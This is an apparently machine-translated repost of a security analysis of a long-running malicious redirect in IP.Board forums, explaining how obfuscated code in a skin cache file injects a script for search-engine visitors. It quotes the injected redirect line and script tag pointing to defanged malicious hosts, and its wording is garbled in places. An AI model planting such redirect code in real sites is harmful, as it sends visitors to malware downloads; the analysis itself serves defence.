IP. Board CMS malicious redirect analysis-vulnerability warning-the black bar safety net

ID MYHACK58:62201559176
Type myhack58
Reporter 佚名
Modified 2015-02-17T00:00:00


IP. Board CMS is a famous CMS system, which allows users to easily create and manage online communities. And recently Sucuri researcher recently found a for the IP. Board of redirection. After analysis, researchers found that this attack has lasted 2 years.


Visitors is a malicious redirect

The redirect symptoms are very typical, some through a Google search visitors will be redirected to a malicious website: filestore321 . com/download . php? id=hexnumber it. Each visitor will only be redirected once redirected click not redirected.

We capture the HTTP traffic and found that Web page from"hxxp://forum . hackedsite . com/index. php? ipbv=4458734cb50e112ba7dd3a154b22ecd9&g=js"to load the script, the script content is as follows:

document. location='hxxp://filestore321 . com/download . php? id=8-digit-hex-number'

Working principle

That redirection is how to by IP. Board run? Due to our IP. The Board also is not like WordPress as much about, so look for sources of waste us a lot of Kung Fu. We refer to the 2 years ago Peter Upfold of an article article 。 In this article, we find the redirect works, and found that this technique two years ago it appeared, but no major changes.

Everyone does not need access to Peter Upfold's article, I will explain malicious software works and behavior patterns.

IP. Board use of the skin will also stored in the database and on the hard disk(as a file storage), if there is a cache, then it will be stored in the ./ cache/skin_cache/cacheid_n, n represents the skin of the number. We found the affected skin file is the ./ cache/skin_cache/cacheid_4 under skin_global. php file.


Highlight the line 6 is what we in this 120kb skin files to find malicious code.

The three passing through the encryption Code of the variable name with the $rsa, $pka, $pkb, let people mistakenly think that what is the security key.

We restored after the confusion of the code, as shown below


First, it will check the visitors whether the source is from search engine or social network link and confirmation is not what crawler. If this is the visitors first visit(not lang_id cookie), it will be in page injected a script with:

<script type='text/javascript' src='hxxp://hackedsite . com/index. php? ipbv=<some-hash>&g=js'>

[1] [2] [3] next